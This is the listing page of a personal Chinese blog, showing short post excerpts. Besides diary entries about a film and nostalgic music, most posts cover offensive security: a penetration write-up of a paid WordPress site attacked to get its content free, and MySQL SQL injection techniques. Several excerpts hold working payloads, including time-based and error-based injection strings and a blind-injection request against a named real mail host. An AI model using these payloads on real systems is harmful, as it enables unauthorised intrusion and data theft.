《线人》———男人

《线人》———男人
《线人》是一部电影,谢霆锋主演。曾经看过这个电影,今天电视又播放了,顺带就又看了一遍,这次看的感触略微有些深。为什么标题有男人,因为从这个电影看到了男人应该有的一面,那就是为了家人,可以舍弃一切,只因为两个字那就是担当。 男人!男人就应该顶天立地,这才是男人。为了家人,为了家庭,现在的男人比以前的男人担子更重。 男人你别怕苦,男人你别怕累,既然你...
2016年03月18日 个人日记 暂无评论 喜欢 0 阅读 3,120 views 次 阅读全文

记一次渗透过程(wpscan+LuManage(sql注入)+memcached未经授权访问)

记一次渗透过程(wpscan+LuManage(sql注入)+memcached未经授权访问)
文章来源土司:https://www.t00ls.net/thread-33339-1-1.html 文章作者:lalala 网站是一个wordpress的福利站,需要充值vip才可以看内容,无奈我这种屌丝肯定不会花钱去买。于是就对网站下手了。先展示一下网站首页。 目标地址 WordPress的站,首先想到的便是wpscan扫 wpscan扫描 爆出了网站的robots.txt,网站路径,和wp4.3.3版本。除了这些,wpcan并没有爆出太多有用的东西...
2016年03月18日 汪洋大海 暂无评论 喜欢 0 阅读 8,288 views 次 阅读全文

SQL Injections in MySQL LIMIT clause

SQL Injections in MySQL LIMIT clause
此方法适用于MySQL 5.x中,在limit语句后面的注入 例如: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESU...
2016年03月12日 汪洋大海 暂无评论 喜欢 0 阅读 3,614 views 次 阅读全文

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)

密码保护:WooYun→lijiejie→漏洞利用方式总结(入侵技术总结)
一、首先是一个JD的漏洞。如下 1 2 3 POST https://mail.jd.com/Erpout/Logon.aspx //页面源码为UTF-8   captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cben...
2016年03月08日 学习笔记 要查看留言请输入您的密码。 喜欢 0 阅读 3,018 views 次 阅读全文

mysql注入常用函数意义意思讲解

mysql注入常用函数意义意思讲解
常用注入语句: if(left(db_name(),1)='d')waitfor/**/dalay/**/'0:0:2'/**/-- or if(length(database())-8,benchmark(4000000,sha1(1)),1) (select(0)from(select(sleep(2)))v) Client-IP: * 注射,。 X-FORWARDED-FOR: * 注射,。 //介绍几个常用函数,都是MYSQL 查询中的使用意义: 1. version()——MySQL版本 2. user()——用户名 3. database()——数据库名 4. @@datadir——...
2016年03月08日 学习笔记 暂无评论 喜欢 0 阅读 4,620 views 次 阅读全文

windows10 所有exe文件无法打开 鼠标右键没有”打开”

windows10 所有exe文件无法打开 鼠标右键没有”打开”
今天在更改某个exe软件标题,我得先啰嗦一下,就是大概我在更改一个软件,主要是为了让软件在运行的时候变名称,例如原来是qq.exe我想让它在进程中改名,变为asdf.exe,结果刚弄完,弄成功了,然后所有的exe文件没有打开选项。所有的exe文件无法打开,用鼠标右键点击exe文件的时候,居然没有“打开”选项。。。 我换个用户就有“打开”选项,基本可以证明是注册表的事了。那么,...
2016年03月08日 学习笔记 暂无评论 喜欢 2 阅读 5,550 views 次 阅读全文

MYSQL高级报错注入脚本安全

MYSQL高级报错注入脚本安全
 MYSQL高级报错注入     and (select count(*) from mysql.user)>0/*     1、查看MYSQL版本     and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)     2、爆所有库     and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM infor...
2016年03月07日 汪洋大海 暂无评论 喜欢 0 阅读 3,569 views 次 阅读全文

深入了解SQL注入绕过waf和过滤机制

深入了解SQL注入绕过waf和过滤机制
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪。之前对WAF接触比较少纯粹是新手趁此科普了 一下并查阅了一些绕过W...
2016年03月07日 汪洋大海 暂无评论 喜欢 0 阅读 2,945 views 次 阅读全文

Burp Suite firefox chrome https Diffie-Hellman 解决方法

Burp Suite firefox chrome https Diffie-Hellman 解决方法
服务器的瞬时 Diffie-Hellman 公共密钥过弱 ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY 相信大家无论是用最新的chrome、还是最新的firefox,只要使用BURP SUITE访问HTTPS网站都会出现上述内容。 那这个问题应该怎么解决呢。 下面是我收集的网络上说的解决方法,但是我亲测都不可用!!!不过最下面我会给出亲测可用方法。 --------------------网络收集的方法---------------------...
2016年03月04日 学习笔记 暂无评论 喜欢 0 阅读 5,993 views 次 阅读全文

这个音乐也许只有70-80男人能’听懂’的音乐

这个音乐也许只有70-80男人能’听懂’的音乐
00:00/00:00 别说话,如果你是用手机看此文章请先点击上面的三角号,播放音乐。然后听着音乐,让我一起回忆那曾经的美好。 曾经咱们为了它,咱们没日没夜!曾经咱们为了它,咱们放弃一切!!曾经的曾经,它的一切已经深深的烙印在我们的最美好的回忆里。 在这里,我突然特别想问你,你第一个建立的职业是什么?法师?武士?道士?你还记得吗?第一次建立人物叫的名字?我猜...
2016年03月02日 个人日记 评论 2 条 喜欢 0 阅读 4,392 views 次 阅读全文